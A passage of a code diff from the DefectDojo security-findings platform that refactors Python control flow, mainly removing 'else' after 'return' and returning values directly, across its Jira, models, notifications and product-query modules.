get_jira_project(obj.finding, use_inheritance=use_inheritance) - else: - return None + return None if isinstance(obj, Finding) or isinstance(obj, Stub_Finding): finding = obj @@ -205,9 +205,8 @@ def get_jira_project(obj, use_inheritance=True): if use_inheritance: logger.debug("delegating to product %s for %s", engagement.product, engagement) return get_jira_project(engagement.product) - else: - logger.debug("not delegating to product %s for %s", engagement.product, engagement) - return None + logger.debug("not delegating to product %s for %s", engagement.product, engagement) + return None if isinstance(obj, Product): # TODO: refactor relationships, but now this would brake APIv1 (and v2?) @@ -241,7 +240,7 @@ def get_jira_url(obj): issue = get_jira_issue(obj) if issue is not None: return get_jira_issue_url(issue) - elif isinstance(obj, Finding): + if isinstance(obj, Finding): # finding must only have url if there is a jira_issue # engagement can continue to show url of jiraproject instead of jira issue return None @@ -320,8 +319,7 @@ def get_jira_issue_template(obj): if isinstance(obj, Finding_Group): return os.path.join(template_dir, "jira-finding-group-description.tpl") - else: - return os.path.join(template_dir, "jira-description.tpl") + return os.path.join(template_dir, "jira-description.tpl") def get_jira_creation(obj): @@ -357,6 +355,7 @@ def get_jira_issue(obj): return obj.jira_issue except JIRA_Issue.DoesNotExist: return None + return None def has_jira_configured(obj): @@ -424,6 +423,7 @@ def get_jira_connection(obj): if jira_instance is not None: return get_jira_connection_raw(jira_instance.url, jira_instance.username, jira_instance.password) + return None def jira_get_resolution_id(jira, issue, status): @@ -468,6 +468,7 @@ def get_jira_updated(finding): project = get_jira_project(finding) issue = jira_get_issue(project, j_issue) return issue.fields.updated + return None # Used for unit testing so geting all the connections is manadatory @@ -481,6 +482,7 @@ def get_jira_status(finding): project = get_jira_project(finding) issue = jira_get_issue(project, j_issue) return issue.fields.status + return None # Used for unit testing so geting all the connections is manadatory @@ -494,6 +496,7 @@ def get_jira_comments(finding): project = get_jira_project(finding) issue = jira_get_issue(project, j_issue) return issue.fields.comment.comments + return None # Logs the error to the alerts table, which appears in the notification toolbar @@ -617,7 +620,7 @@ def jira_priority(obj): def jira_environment(obj): if isinstance(obj, Finding): return "\n".join([str(endpoint) for endpoint in obj.endpoints.all()]) - elif isinstance(obj, Finding_Group): + if isinstance(obj, Finding_Group): envs = [ jira_environment(finding) for finding in obj.findings.all() @@ -625,8 +628,7 @@ def jira_environment(obj): jira_environments = [env for env in envs if env] return "\n".join(jira_environments) - else: - return "" + return "" def push_to_jira(obj, *args, **kwargs): @@ -638,25 +640,22 @@ def push_to_jira(obj, *args, **kwargs): finding = obj if finding.has_jira_issue: return update_jira_issue_for_finding(finding, *args, **kwargs) - else: - return add_jira_issue_for_finding(finding, *args, **kwargs) + return add_jira_issue_for_finding(finding, *args, **kwargs) - elif isinstance(obj, Engagement): + if isinstance(obj, Engagement): engagement = obj if engagement.has_jira_issue: return update_epic(engagement, *args, **kwargs) - else: - return add_epic(engagement, *args, **kwargs) + return add_epic(engagement, *args, **kwargs) - elif isinstance(obj, Finding_Group): + if isinstance(obj, Finding_Group): group = obj if group.has_jira_issue: return update_jira_issue_for_finding_group(group, *args, **kwargs) - else: - return add_jira_issue_for_finding_group(group, *args, **kwargs) + return add_jira_issue_for_finding_group(group, *args, **kwargs) - else: - logger.error("unsupported object passed to push_to_jira: %s %i %s", obj.__name__, obj.id, obj) + logger.error("unsupported object passed to push_to_jira: %s %i %s", obj.__name__, obj.id, obj) + return None def add_issues_to_epic(jira, obj, epic_id, issue_keys, ignore_epics=True): @@ -1022,9 +1021,7 @@ def get_jira_issue_from_jira(find): jira = get_jira_connection(jira_instance) logger.debug("getting issue from JIRA") - issue_from_jira = jira.issue(j_issue.jira_id) - - return issue_from_jira + return jira.issue(j_issue.jira_id) except JIRAError as e: logger.exception(e) @@ -1191,6 +1188,7 @@ def jira_attachment(finding, jira, issue, file, jira_filename=None): logger.exception(e) log_jira_alert("Attachment: " + e.text, finding) return False + return None def jira_check_attachment(issue, source_file_name): @@ -1242,9 +1240,9 @@ def close_epic(eng, push_to_jira, **kwargs): logger.exception(e) log_jira_generic_alert("Jira Engagement/Epic Close Error", str(e)) return False - else: - add_error_message_to_response("Push to JIRA for Epic skipped because enable_engagement_epic_mapping is not checked for this engagement") - return False + return None + add_error_message_to_response("Push to JIRA for Epic skipped because enable_engagement_epic_mapping is not checked for this engagement") + return False @dojo_model_to_id @@ -1350,9 +1348,8 @@ def jira_get_issue(jira_project, issue_key): try: jira_instance = jira_project.jira_instance jira = get_jira_connection(jira_instance) - issue = jira.issue(issue_key) + return jira.issue(issue_key) - return issue except JIRAError as jira_error: logger.debug("error retrieving jira issue " + issue_key + " " + str(jira_error)) logger.exception(jira_error) @@ -1386,6 +1383,8 @@ def add_comment(obj, note, force_push=False, **kwargs): except JIRAError as e: log_jira_generic_alert("Jira Add Comment Error", str(e)) return False + return None + return None def add_simple_jira_comment(jira_instance, jira_issue, comment): diff --git a/dojo/jira_link/queries.py b/dojo/jira_link/queries.py index 6d41b3b6e21..b077c076097 100644 --- a/dojo/jira_link/queries.py +++ b/dojo/jira_link/queries.py @@ -63,7 +63,7 @@ def get_authorized_jira_projects(permission, user=None): product__member=Exists(product_authorized_product_roles), product__prod_type__authorized_group=Exists(product_authorized_product_type_groups), product__authorized_group=Exists(product_authorized_product_groups)) - jira_projects = jira_projects.filter( + return jira_projects.filter( Q(engagement__product__prod_type__member=True) | Q(engagement__product__member=True) | Q(engagement__product__prod_type__authorized_group=True) @@ -73,8 +73,6 @@ def get_authorized_jira_projects(permission, user=None): | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - return jira_projects - def get_authorized_jira_issues(permission): user = get_current_user() @@ -152,7 +150,7 @@ def get_authorized_jira_issues(permission): finding__test__engagement__product__member=Exists(finding_authorized_product_roles), finding__test__engagement__product__prod_type__authorized_group=Exists(finding_authorized_product_type_groups), finding__test__engagement__product__authorized_group=Exists(finding_authorized_product_groups)) - jira_issues = jira_issues.filter( + return jira_issues.filter( Q(engagement__product__prod_type__member=True) | Q(engagement__product__member=True) | Q(engagement__product__prod_type__authorized_group=True) @@ -165,5 +163,3 @@ def get_authorized_jira_issues(permission): | Q(finding__test__engagement__product__member=True) | Q(finding__test__engagement__product__prod_type__authorized_group=True) | Q(finding__test__engagement__product__authorized_group=True)) - - return jira_issues diff --git a/dojo/jira_link/views.py b/dojo/jira_link/views.py index e618c84f01c..fc2f67a373a 100644 --- a/dojo/jira_link/views.py +++ b/dojo/jira_link/views.py @@ -67,10 +67,10 @@ def webhook(request, secret=None): if not system_settings.enable_jira: return webhook_responser_handler("info", "Ignoring incoming webhook as JIRA is disabled.") # If the webhook is not enabled, then return a 404 - elif not system_settings.enable_jira_web_hook: + if not system_settings.enable_jira_web_hook: return webhook_responser_handler("info", "Ignoring incoming webhook as JIRA Webhook is disabled.") # Determine if the request should be "authenticated" - elif not system_settings.disable_jira_webhook_secret: + if not system_settings.disable_jira_webhook_secret: # Make sure there is a value for the webhook secret before making a comparison if not system_settings.jira_webhook_secret: return webhook_responser_handler("info", "Ignoring incoming webhook as JIRA Webhook secret is empty in Defect Dojo system settings.") @@ -211,7 +211,7 @@ def check_for_and_create_comment(parsed_json): """ comment = parsed_json.get("comment", None) if comment is None: - return + return None comment_text = comment.get("body") commenter = "" @@ -271,6 +271,7 @@ def check_for_and_create_comment(parsed_json): finding.jira_issue.jira_change = timezone.now() finding.jira_issue.save() finding.save() + return None def get_custom_field(jira, label): @@ -432,8 +433,7 @@ def post(self, request): url=request.build_absolute_uri(reverse("jira"))) return HttpResponseRedirect(reverse("jira")) - else: - logger.error("jform.errors: %s", jform.errors) + logger.error("jform.errors: %s", jform.errors) return render(request, self.get_template(), {"jform": jform}) diff --git a/dojo/management/commands/jira_status_reconciliation.py b/dojo/management/commands/jira_status_reconciliation.py index 6ca72dbe1f1..e26aefc0516 100644 --- a/dojo/management/commands/jira_status_reconciliation.py +++ b/dojo/management/commands/jira_status_reconciliation.py @@ -86,7 +86,7 @@ def jira_status_reconciliation(*args, **kwargs): messages.append(message) logger.info(message) continue - elif find.risk_accepted: + if find.risk_accepted: message = "{}; {}/finding/{};{};{};{};{};{};{};{};{};{};{};{}skipping risk accepted findings;{}".format( find.jira_issue.jira_key, settings.SITE_URL, find.id, find.status(), resolution_name, None, None, None, find.jira_issue.jira_change, issue_from_jira.fields.updated, find.last_status_update, issue_from_jira.fields.updated, find.last_reviewed, issue_from_jira.fields.updated, "skipped") @@ -186,6 +186,7 @@ def jira_status_reconciliation(*args, **kwargs): logger.info("results (semicolon seperated)") for message in messages: logger.info(message) + return None class Command(BaseCommand): diff --git a/dojo/metrics/utils.py b/dojo/metrics/utils.py index 8ca345b41f7..884658d5ba1 100644 --- a/dojo/metrics/utils.py +++ b/dojo/metrics/utils.py @@ -597,5 +597,4 @@ def findings_queryset( """ if qs.model is Endpoint_Status: return Finding.objects.filter(status_finding__in=qs) - else: - return qs + return qs diff --git a/dojo/models.py b/dojo/models.py index 308db965228..2346c1e916c 100644 --- a/dojo/models.py +++ b/dojo/models.py @@ -764,9 +764,8 @@ def get_absolute_url(self): return reverse("product_type", args=[str(self.id)]) def get_breadcrumbs(self): - bc = [{"title": str(self), + return [{"title": str(self), "url": reverse("edit_product_type", args=(self.id,))}] - return bc @cached_property def critical_present(self): @@ -774,6 +773,7 @@ def critical_present(self): test__engagement__product__prod_type=self, severity="Critical") if c_findings.count() > 0: return True + return None @cached_property def high_present(self): @@ -781,6 +781,7 @@ def high_present(self): test__engagement__product__prod_type=self, severity="High") if c_findings.count() > 0: return True + return None @cached_property def calc_health(self): @@ -798,8 +799,7 @@ def calc_health(self): health = health - ((h_findings.count() - 1) * 2) if health < 5: return 5 - else: - return health + return health # only used by bulk risk acceptance api @property @@ -835,9 +835,8 @@ def __str__(self): return self.name def get_breadcrumbs(self): - bc = [{"title": str(self), + return [{"title": str(self), "url": None}] - return bc class DojoMeta(models.Model): @@ -1180,8 +1179,7 @@ def endpoint_host_count(self): for e in endpoints: if e.host in hosts: continue - else: - hosts.append(e.host) + hosts.append(e.host) return len(hosts) @@ -1196,53 +1194,51 @@ def endpoint_count(self): def open_findings(self, start_date=None, end_date=None): if start_date is None or end_date is None: return {} - else: - critical = Finding.objects.filter(test__engagement__product=self, - mitigated__isnull=True, - verified=True, - false_p=False, - duplicate=False, - out_of_scope=False, - severity="Critical", - date__range=[start_date, - end_date]).count() - high = Finding.objects.filter(test__engagement__product=self, + critical = Finding.objects.filter(test__engagement__product=self, mitigated__isnull=True, verified=True, false_p=False, duplicate=False, out_of_scope=False, - severity="High", + severity="Critical", date__range=[start_date, end_date]).count() - medium = Finding.objects.filter(test__engagement__product=self, - mitigated__isnull=True, - verified=True, - false_p=False, - duplicate=False, - out_of_scope=False, - severity="Medium", - date__range=[start_date, - end_date]).count() - low = Finding.objects.filter(test__engagement__product=self, - mitigated__isnull=True, - verified=True, - false_p=False, - duplicate=False, - out_of_scope=False, - severity="Low", - date__range=[start_date, - end_date]).count() - return {"Critical": critical, - "High": high, - "Medium": medium, - "Low": low, - "Total": (critical + high + medium + low)} + high = Finding.objects.filter(test__engagement__product=self, + mitigated__isnull=True, + verified=True, + false_p=False, + duplicate=False, + out_of_scope=False, + severity="High", + date__range=[start_date, + end_date]).count() + medium = Finding.objects.filter(test__engagement__product=self, + mitigated__isnull=True, + verified=True, + false_p=False, + duplicate=False, + out_of_scope=False, + severity="Medium", + date__range=[start_date, + end_date]).count() + low = Finding.objects.filter(test__engagement__product=self, + mitigated__isnull=True, + verified=True, + false_p=False, + duplicate=False, + out_of_scope=False, + severity="Low", + date__range=[start_date, + end_date]).count() + return {"Critical": critical, + "High": high, + "Medium": medium, + "Low": low, + "Total": (critical + high + medium + low)} def get_breadcrumbs(self): - bc = [{"title": str(self), + return [{"title": str(self), "url": reverse("view_product", args=(self.id,))}] - return bc @property def get_product_type(self): @@ -1700,9 +1696,8 @@ def __str__(self): msg = "hyperlink lib did not create URL as was expected" raise ValueError(msg) return clean_url - else: - msg = "Missing host" - raise ValueError(msg) + msg = "Missing host" + raise ValueError(msg) except: url = "" if self.protocol: @@ -1814,11 +1809,9 @@ def __eq__(self, other): products_match = (self.product) == other.product # Check if the contents match return products_match and contents_match - else: - return contents_match + return contents_match - else: - return NotImplemented + return NotImplemented @property def is_broken(self): @@ -1829,8 +1822,7 @@ def is_broken(self): else: if self.product: return False - else: - return True + return True @property def mitigated(self): @@ -1851,7 +1843,7 @@ def findings_count(self): return self.findings.all().count() def active_findings(self): - findings = self.findings.filter( + return self.findings.filter( active=True, out_of_scope=False, mitigated__isnull=True, @@ -1861,10 +1853,9 @@ def active_findings(self): status_finding__out_of_scope=False, status_finding__risk_accepted=False, ).order_by("numerical_severity") - return findings def active_verified_findings(self): - findings = self.findings.filter( + return self.findings.filter( active=True, verified=True, out_of_scope=False, @@ -1875,7 +1866,6 @@ def active_verified_findings(self): status_finding__out_of_scope=False, status_finding__risk_accepted=False, ).order_by("numerical_severity") - return findings @property def active_findings_count(self): @@ -1919,7 +1909,7 @@ def host_findings_count(self): return self.host_findings().count() def host_active_findings(self): - findings = Finding.objects.filter( + return Finding.objects.filter( active=True, out_of_scope=False, mitigated__isnull=True, @@ -1930,10 +1920,9 @@ def host_active_findings(self): status_finding__risk_accepted=False, endpoints__in=self.host_endpoints(), ).order_by("numerical_severity") - return findings def host_active_verified_findings(self): - findings = Finding.objects.filter( + return Finding.objects.filter( active=True, verified=True, out_of_scope=False, @@ -1945,7 +1934,6 @@ def host_active_verified_findings(self): status_finding__risk_accepted=False, endpoints__in=self.host_endpoints(), ).order_by("numerical_severity") - return findings @property def host_active_findings_count(self): @@ -2220,8 +2208,7 @@ def get_queryset(self): super_query = super_query.annotate(created_findings_count=Count("findings", filter=Q(test_import_finding_action__action=IMPORT_CREATED_FINDING))) super_query = super_query.annotate(closed_findings_count=Count("findings", filter=Q(test_import_finding_action__action=IMPORT_CLOSED_FINDING))) super_query = super_query.annotate(reactivated_findings_count=Count("findings", filter=Q(test_import_finding_action__action=IMPORT_REACTIVATED_FINDING))) - super_query = super_query.annotate(untouched_findings_count=Count("findings", filter=Q(test_import_finding_action__action=IMPORT_UNTOUCHED_FINDING))) - return super_query + return super_query.annotate(untouched_findings_count=Count("findings", filter=Q(test_import_finding_action__action=IMPORT_UNTOUCHED_FINDING))) class Meta: ordering = ("-id",) @@ -2878,53 +2865,47 @@ def hash_fields(self, fields_to_hash): def duplicate_finding_set(self): if self.duplicate: if self.duplicate_finding is not None: - originals = Finding.objects.get( + return Finding.objects.get( id=self.duplicate_finding.id).original_finding.all().order_by("title") - return originals # we need to add the duplicate_finding here as well - else: - return [] - else: - return self.original_finding.all().order_by("title") + return [] + return self.original_finding.all().order_by("title") def get_scanner_confidence_text(self): if self.scanner_confidence and isinstance(self.scanner_confidence, int): if self.scanner_confidence <= 2: return "Certain" - elif self.scanner_confidence >= 3 and self.scanner_confidence <= 5: + if self.scanner_confidence >= 3 and self.scanner_confidence <= 5: return "Firm" - else: - return "Tentative" + return "Tentative" return "" @staticmethod def get_numerical_severity(severity): if severity == "Critical": return "S0" - elif severity == "High": + if severity == "High": return "S1" - elif severity == "Medium": + if severity == "Medium": return "S2" - elif severity == "Low": + if severity == "Low": return "S3" - elif severity == "Info": + if severity == "Info": return "S4" - else: - return "S5" + return "S5" @staticmethod def get_number_severity(severity): if severity == "Critical": return 4 - elif severity == "High": + if severity == "High": return 3 - elif severity == "Medium": + if severity == "Medium": return 2 - elif severity == "Low": + if severity == "Low": return 1 - elif severity == "Info": + if severity == "Info": return 0 - else: - return 5 + return 5 @staticmethod def get_severity(num_severity): @@ -2998,8 +2979,7 @@ def sla_age(self): def get_sla_start_date(self): if self.sla_start_date: return self.sla_start_date - else: - return self.date + return self.date def get_sla_period(self): sla_configuration = SLA_Configuration.objects.filter(id=self.test.engagement.product.sla_configuration_id).first() @@ -3010,7 +2990,7 @@ def get_sla_period(self): def set_sla_expiration_date(self): system_settings = System_Settings.objects.get() if not system_settings.enable_finding_sla: - return None + return days_remaining = None sla_period, enforce_period = self.get_sla_period() @@ -3018,7 +2998,7 @@ def set_sla_expiration_date(self): days_remaining = sla_period - self.sla_age else: self.sla_expiration_date = Finding().sla_expiration_date - return None + return if days_remaining: if self.mitigated: @@ -3036,8 +3016,7 @@ def sla_days_remaining(self): if isinstance(mitigated_date, datetime): mitigated_date = self.mitigated.date() return (self.sla_expiration_date - mitigated_date).days - else: - return (self.sla_expiration_date - get_current_date()).days + return (self.sla_expiration_date - get_current_date()).days return None def sla_deadline(self): @@ -3079,9 +3058,8 @@ def has_jira_issue(self): @cached_property def finding_group(self): - group = self.finding_group_set.all().first() + return self.finding_group_set.all().first() # logger.debug('finding.finding_group: %s', group) - return group @cached_property def has_jira_group_issue(self): @@ -3131,21 +3109,20 @@ def get_valid_request_response_pairs(self): # Get a list of all req/resp pairs all_req_resps = self.burprawrequestresponse_set.all() # Filter away those that do not have any contents - valid_req_resps = all_req_resps.exclude( + return all_req_resps.exclude( burpRequestBase64__exact=empty_value, burpResponseBase64__exact=empty_value, ) - return valid_req_resps - def get_report_requests(self): # Get the list of request response pairs that are non empty request_response_pairs = self.get_valid_request_response_pairs() # Determine how many to return if request_response_pairs.count() >= 3: return request_response_pairs[0:3] - elif request_response_pairs.count() > 0: + if request_response_pairs.count() > 0: return request_response_pairs + return None def get_request(self): # Get the list of request response pairs that are non empty @@ -3163,8 +3140,7 @@ def get_response(self): reqres = request_response_pairs.first() res = base64.b64decode(reqres.burpResponseBase64) # Removes all blank lines - res = re.sub(r"\n\s*\n", "\n", res) - return res + return re.sub(r"\n\s*\n", "\n", res) def latest_note(self): if self.notes.all(): @@ -3250,8 +3226,7 @@ def bitbucket_standalone_prepare_scm_base_link(self, uri): project = parts_project[0] if project.startswith("~"): return parts_scm[0] + "/users/" + parts_project[0][1:] + "/repos/" + parts_project[1] + "/browse" - else: - return parts_scm[0] + "/projects/" + parts_project[0] + "/repos/" + parts_project[1] + "/browse" + return parts_scm[0] + "/projects/" + parts_project[0] + "/repos/" + parts_project[1] + "/browse" def bitbucket_standalone_prepare_scm_link(self, uri): # if commit hash or branch/tag is set for engagement/test - @@ -3336,9 +3311,7 @@ def vulnerability_ids(self): vulnerability_ids = [self.cve] # Remove duplicates - vulnerability_ids = list(dict.fromkeys(vulnerability_ids)) - - return vulnerability_ids + return list(dict.fromkeys(vulnerability_ids)) def inherit_tags(self, potentially_existing_tags): # get a copy of the tags to be inherited @@ -3526,9 +3499,8 @@ def get_absolute_url(self): return reverse("edit_template", args=[str(self.id)]) def get_breadcrumbs(self): - bc = [{"title": str(self), + return [{"title": str(self), "url": reverse("view_template", args=(self.id,))}] - return bc @cached_property def vulnerability_ids(self): @@ -3549,9 +3521,7 @@ def vulnerability_ids(self): vulnerability_ids = [self.cve] # Remove duplicates - vulnerability_ids = list(dict.fromkeys(vulnerability_ids)) - - return vulnerability_ids + return list(dict.fromkeys(vulnerability_ids)) class Vulnerability_Id_Template(models.Model): @@ -3599,10 +3569,9 @@ class Check_List(models.Model): def get_status(pass_fail): if pass_fail == "Pass": return "success" - elif pass_fail == "Fail": + if pass_fail == "Fail": return "danger" - else: - return "warning" + return "warning" def get_breadcrumb(self): bc = self.engagement.get_breadcrumb() @@ -3623,8 +3592,7 @@ def get_request(self): def get_response(self): res = str(base64.b64decode(self.burpResponseBase64), errors="ignore") # Removes all blank lines - res = re.sub(r"\n\s*\n", "\n", res) - return res + return re.sub(r"\n\s*\n", "\n", res) class Risk_Acceptance(models.Model): @@ -3880,16 +3848,15 @@ def false_positive_resolutions(self): def get_priority(self, status): if status == "Info": return self.info_mapping_severity - elif status == "Low": + if status == "Low": return self.low_mapping_severity - elif status == "Medium": + if status == "Medium": return self.medium_mapping_severity - elif status == "High": + if status == "High": return self.high_mapping_severity - elif status == "Critical": + if status == "Critical": return self.critical_mapping_severity - else: - return "N/A" + return "N/A" # declare form here as we can't import forms.py due to circular imports not even locally @@ -4599,8 +4566,7 @@ class ChoiceAnswer(Answer): def __str__(self): if len(self.answer.all()): return str(self.answer.all()[0]) - else: - return "No Response" + return "No Response" if settings.ENABLE_AUDITLOG: diff --git a/dojo/notes/views.py b/dojo/notes/views.py index a5947971b8a..6dfca7895d1 100644 --- a/dojo/notes/views.py +++ b/dojo/notes/views.py @@ -123,11 +123,10 @@ def edit_note(request, id, page, objid): _("Note edited."), extra_tags="alert-success") return HttpResponseRedirect(reverse(reverse_url, args=(object_id, ))) - else: - messages.add_message(request, - messages.SUCCESS, - _("Note was not succesfully edited."), - extra_tags="alert-danger") + messages.add_message(request, + messages.SUCCESS, + _("Note was not succesfully edited."), + extra_tags="alert-danger") else: if note_type_activation: form = TypedNoteForm(available_note_types=available_note_types, instance=note) @@ -195,5 +194,4 @@ def find_available_notetypes(finding, editing_note): available_note_types.append(note_type_id) available_note_types.append(editing_note.note_type_id) available_note_types = list(set(available_note_types)) - queryset = Note_Type.objects.filter(id__in=available_note_types).order_by("-id") - return queryset + return Note_Type.objects.filter(id__in=available_note_types).order_by("-id") diff --git a/dojo/notifications/helper.py b/dojo/notifications/helper.py index 9acbf94d215..ce3f52bf1a5 100644 --- a/dojo/notifications/helper.py +++ b/dojo/notifications/helper.py @@ -343,14 +343,13 @@ def webhooks_notification_request(endpoint, event, *args, **kwargs): timeout = get_system_setting("webhooks_notifications_timeout") - res = requests.request( + return requests.request( method="POST", url=endpoint.url, headers=headers, json=data, timeout=timeout, ) - return res def test_webhooks_notification(endpoint): @@ -522,18 +521,17 @@ def get_slack_user_id(user_email): logger.error("Slack is complaining. See error message below.") logger.error(user) raise RuntimeError("Error getting user list from Slack: " + res.text) - else: - if "email" in user["user"]["profile"]: - if user_email == user["user"]["profile"]["email"]: - if "id" in user["user"]: - user_id = user["user"]["id"] - logger.debug(f"Slack user ID is {user_id}") - slack_user_is_found = True - else: - logger.warning(f"A user with email {user_email} could not be found in this Slack workspace.") - - if not slack_user_is_found: - logger.warning("The Slack user was not found.") + if "email" in user["user"]["profile"]: + if user_email == user["user"]["profile"]["email"]: + if "id" in user["user"]: + user_id = user["user"]["id"] + logger.debug(f"Slack user ID is {user_id}") + slack_user_is_found = True + else: + logger.warning(f"A user with email {user_email} could not be found in this Slack workspace.") + + if not slack_user_is_found: + logger.warning("The Slack user was not found.") return user_id diff --git a/dojo/notifications/views.py b/dojo/notifications/views.py index 6a2495330d7..7fe5562ee7e 100644 --- a/dojo/notifications/views.py +++ b/dojo/notifications/views.py @@ -158,8 +158,7 @@ def get_form( ) -> NotificationsWebhookForm: if request.method == "POST": return NotificationsWebhookForm(request.POST, is_superuser=request.user.is_superuser, **kwargs) - else: - return NotificationsWebhookForm(is_superuser=request.user.is_superuser, **kwargs) + return NotificationsWebhookForm(is_superuser=request.user.is_superuser, **kwargs) def preprocess_request(self, request: HttpRequest): # Check Webhook notifications are enabled @@ -182,10 +181,9 @@ def get_initial_context(self, request: HttpRequest, nwhs: Notification_Webhooks) } def get_notification_webhooks(self, request: HttpRequest): - nwhs = Notification_Webhooks.objects.all().order_by("name") + return Notification_Webhooks.objects.all().order_by("name") # TODO: finished pagination # TODO: restrict based on user - not only superadmins have access and they see everything - return nwhs def get(self, request: HttpRequest): # Run common checks @@ -377,8 +375,7 @@ def get_form( ) -> NotificationsWebhookForm: if request.method == "POST": return DeleteNotificationsWebhookForm(request.POST, **kwargs) - else: - return DeleteNotificationsWebhookForm(**kwargs) + return DeleteNotificationsWebhookForm(**kwargs) def get_initial_context(self, request: HttpRequest, nwh: Notification_Webhooks): return { diff --git a/dojo/object/views.py b/dojo/object/views.py index dfb4f590556..0cca584b0be 100644 --- a/dojo/object/views.py +++ b/dojo/object/views.py @@ -30,14 +30,14 @@ def new_object(request, pid): "Added Tracked File to a Product", extra_tags="alert-success") return HttpResponseRedirect(reverse("view_objects", args=(pid,))) - else: - tform = ObjectSettingsForm() - product_tab = Product_Tab(prod, title="Add Tracked Files to a Product", tab="settings") + return None + tform = ObjectSettingsForm() + product_tab = Product_Tab(prod, title="Add Tracked Files to a Product", tab="settings") - return render(request, "dojo/new_object.html", - {"tform": tform, - "product_tab": product_tab, - "pid": prod.id}) + return render(request, "dojo/new_object.html", + {"tform": tform, + "product_tab": product_tab, + "pid": prod.id}) @user_is_authorized(Product, Permissions.Product_Tracking_Files_View, "pid") @@ -101,8 +101,7 @@ def delete_object(request, pid, ttid): "Tracked Product Files Deleted.", extra_tags="alert-success") return HttpResponseRedirect(reverse("view_objects", args=(pid,))) - else: - tform = DeleteObjectsSettingsForm(instance=object) + tform = DeleteObjectsSettingsForm(instance=object) product_tab = Product_Tab(product, title="Delete Product Tool Configuration", tab="settings") return render(request, diff --git a/dojo/pipeline.py b/dojo/pipeline.py index ea020d2d926..ee2dc0ae186 100644 --- a/dojo/pipeline.py +++ b/dojo/pipeline.py @@ -31,7 +31,7 @@ def social_uid(backend, details, response, *args, **kwargs): "first_name": first_name, "last_name": last_name, "uid": uid} - elif settings.GOOGLE_OAUTH_ENABLED and isinstance(backend, GoogleOAuth2): + if settings.GOOGLE_OAUTH_ENABLED and isinstance(backend, GoogleOAuth2): """Return user details from Google account""" if "sub" in response: google_uid = response["sub"] @@ -51,15 +51,13 @@ def social_uid(backend, details, response, *args, **kwargs): "first_name": first_name, "last_name": last_name, "uid": google_uid} - else: - uid = backend.get_user_id(details, response) - # Used for most backends - if uid: - return {"uid": uid} - # Until OKTA PR in social-core is merged - # This modified way needs to work - else: - return {"uid": response.get("preferred_username")} + uid = backend.get_user_id(details, response) + # Used for most backends + if uid: + return {"uid": uid} + # Until OKTA PR in social-core is merged + # This modified way needs to work + return {"uid": response.get("preferred_username")} def modify_permissions(backend, uid, user=None, social=None, *args, **kwargs): @@ -107,8 +105,7 @@ def update_azure_groups(backend, uid, user=None, social=None, *args, **kwargs): def is_group_id(group): if re.search(r"^[a-zA-Z0-9]{8,}-[a-zA-Z0-9]{4,}-[a-zA-Z0-9]{4,}-[a-zA-Z0-9]{4,}-[a-zA-Z0-9]{12,}$", group): return True - else: - return False + return False def assign_user_to_groups(user, group_names, social_provider): @@ -183,7 +180,6 @@ def sanitize_username(username): def create_user(strategy, details, backend, user=None, *args, **kwargs): if not settings.SOCIAL_AUTH_CREATE_USER: - return - else: - details["username"] = sanitize_username(details.get("username")) - return social_core.pipeline.user.create_user(strategy, details, backend, user, args, kwargs) + return None + details["username"] = sanitize_username(details.get("username")) + return social_core.pipeline.user.create_user(strategy, details, backend, user, args, kwargs) diff --git a/dojo/product/queries.py b/dojo/product/queries.py index 8d562c0f9a4..0be35276ffe 100644 --- a/dojo/product/queries.py +++ b/dojo/product/queries.py @@ -59,20 +59,17 @@ def get_authorized_products(permission, user=None): member=Exists(authorized_product_roles), prod_type__authorized_group=Exists(authorized_product_type_groups), authorized_group=Exists(authorized_product_groups)).order_by("name") - products = products.filter( + return products.filter( Q(prod_type__member=True) | Q(member=True) | Q(prod_type__authorized_group=True) | Q(authorized_group=True)) - return products - def get_authorized_members_for_product(product, permission): user = get_current_user() if user.is_superuser or user_has_permission(user, product, permission): return Product_Member.objects.filter(product=product).order_by("user__first_name", "user__last_name").select_related("role", "user") - else: - return None + return None def get_authorized_groups_for_product(product, permission): @@ -81,8 +78,7 @@ def get_authorized_groups_for_product(product, permission): if user.is_superuser or user_has_permission(user, product, permission): authorized_groups = get_authorized_groups(Permissions.Group_View) return Product_Group.objects.filter(product=product, group__in=authorized_groups).order_by("group__name").select_related("role") - else: - return None + return None def get_authorized_product_members(permission): @@ -164,12 +160,10 @@ def get_authorized_app_analysis(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - app_analysis = app_analysis.filter( + return app_analysis.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - return app_analysis - def get_authorized_dojo_meta(permission): user = get_current_user() @@ -246,7 +240,7 @@ def get_authorized_dojo_meta(permission): finding__test__engagement__product__prod_type__authorized_group=Exists(finding_authorized_product_type_groups), finding__test__engagement__product__authorized_group=Exists(finding_authorized_product_groups), ).order_by("id") - dojo_meta = dojo_meta.filter( + return dojo_meta.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) @@ -260,8 +254,6 @@ def get_authorized_dojo_meta(permission): | Q(finding__test__engagement__product__prod_type__authorized_group=True) | Q(finding__test__engagement__product__authorized_group=True)) - return dojo_meta - def get_authorized_languages(permission): user = get_current_user() @@ -297,12 +289,10 @@ def get_authorized_languages(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - languages = languages.filter( + return languages.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - return languages - def get_authorized_engagement_presets(permission): user = get_current_user() @@ -338,12 +328,10 @@ def get_authorized_engagement_presets(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - engagement_presets = engagement_presets.filter( + return engagement_presets.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - return engagement_presets - def get_authorized_product_api_scan_configurations(permission): user = get_current_user() @@ -379,8 +367,6 @@ def get_authorized_product_api_scan_configurations(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - product_api_scan_configurations = product_api_scan_configurations.filter( + return product_api_scan_configurations.filter( Q(product__prod_type__member=True) | Q(product__member=True) | 